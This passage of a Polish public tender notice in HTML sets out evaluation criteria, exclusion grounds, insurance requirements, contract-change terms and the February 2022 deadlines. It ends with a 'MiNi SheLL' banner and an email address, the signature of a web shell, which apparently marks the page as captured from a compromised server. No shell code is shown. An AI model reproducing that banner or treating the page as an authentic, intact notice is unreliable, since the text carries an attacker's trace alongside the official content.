odrzuceniem oferty na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp, jako niezgodnej z warunkami zamówienia.<br/>RAZEM 100% 100,00<br/>3) Całkowita liczba punktów jaką otrzyma oferta zostanie obliczona wg poniższego wzoru: K=K1 + K2 +K3, gdzie:<br/>K – całkowita liczba punktów<br/>K1 – punkty uzyskane w kryterium K1 – „cena brutto oferty”<br/>K2 – punkty uzyskane w kryterium K2 – „rok produkcji pojazdu przewidzianego do świadczenia usługi”<br/>K3 – punkty uzyskane w kategorii K3 – „maksymalny czas podstawienia zastępczego środka przewozu”<br/>4) Ocena punktowa w kryterium K1 – „cena brutto oferty” zostanie dokonana na podstawie łącznej ceny ofertowej brutto wskazanej przez Wykonawcę w formularzu ofertowym, przeliczona zostanie według wzoru opisanego w tabeli powyżej.<br/>5) Ocena punktowa w kryterium K2 – „rok produkcji pojazdu przewidzianego do świadczenia usługi” zostanie dokonana według zasad opisanych w powyższej tabeli.<br/>6) Ocena punktowa w kryterium K3 – „maksymalny czas podstawienia zastępczego środka przewozu” zostanie dokonana według zasad opisanych w powyższej tabeli.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rok produkcji pojazdu przewidzianego do świadczenia usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Maksymalny czas podstawienia zastępczego środka przewozu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunki udziału w postepowaniu dotyczące:<br/>1) Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>3) Sytuacji ekonomicznej lub finansowej. Zamawiający uzna, że Wykonawca spełnia warunek, jeżeli wykaże, że:<br/>a) w części nr 1 – dysponuje polisą ubezpieczeniową od odpowiedzialności cywilnej na kwotę minimum 25 000,00 zł,<br/>b) w części nr 2 - dysponuje polisą ubezpieczeniową od odpowiedzialności cywilnej na kwotę minimum 60 000,00 zł;<br/>4) Zdolności technicznej lub zawodowej:<br/>a) Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu lub kryteriów selekcji, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych,<br/>b) w odniesieniu do warunków dotyczących doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane,<br/>c) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby,<br/>d) Zamawiający będzie oceniał, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o<br/>których mowa w art. 112 ust. 2 pkt 3 i 4, oraz będzie badał, czy nie zachodzą, wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>1) wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi<br/>zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; <br/>w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Wymagana forma: Wykonawcy składają dokumenty w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie;<br/>2) polisa ubezpieczeniowa lub innych dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalność związanej z przedmiotem zamówienia na kwotę nie mniejszą niż:<br/>a) do części nr 1 – 25 000 zł<br/>b) do części nr 2 – 60 000 zł<br/>Wymagana forma: Wykonawcy składają dokumenty w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie.<br/>− celem potwierdzenia spełnienia warunku określonego w rozdziale II podrozdziale 7 SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. W sytuacji wyboru oferty<br/>wykonawców występujących wspólnie Zamawiający przed udzieleniem zamówienia może żądać umowy regulującej współpracę tych wykonawców. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>- Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>- podmiot trzeci, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>podmiot udostępnia swoje zasoby Wykonawcy (jeżeli dotyczy);<br/>- podwykonawcy, na których zasobach Wykonawca nie polega przy wykazywaniu spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podwykonawcy (jeżeli Zamawiający weryfikuje podstawy wykluczenia w odniesieniu do podwykonawcy);<br/>- podmiot trzeci, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim<br/>podmiot udostępnia swoje zasoby Wykonawcy (jeżeli dotyczy), (Zamawiający weryfikuje podstawy wykluczenia w odniesieniu do podmiotu trzeciego);<br/>- podwykonawcy, na których zasobach Wykonawca nie polega przy wykazywaniu spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podwykonawcy (Zamawiający weryfikuje podstawy wykluczenia w odniesieniu do podwykonawcy). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszcza się możliwość zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z art. 455 ust. 1, a w szczególności pkt. 1 ustawy Pzp, w następującym zakresie i przy wystąpieniu określonych warunków:<br/>1) zmiana Podwykonawcy;<br/>2) zmiana częstotliwości realizacji umowy niepowodująca zmiany wynagrodzenia;<br/>3) zmiana terminów, częstotliwości i sposobu realizacji usługi, a zmiana taka będzie konieczna do prawidłowego wykonania umowy lub gdy działania osób trzecich uniemożliwiają wykonanie prac, a Wykonawca nie ponosi odpowiedzialności za działanie takich osób.<br/>Zmiana postanowień umowy lub jej załączników mogą nastąpić jedynie za zgodą obu Stron na piśmie, pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-18 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-18 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com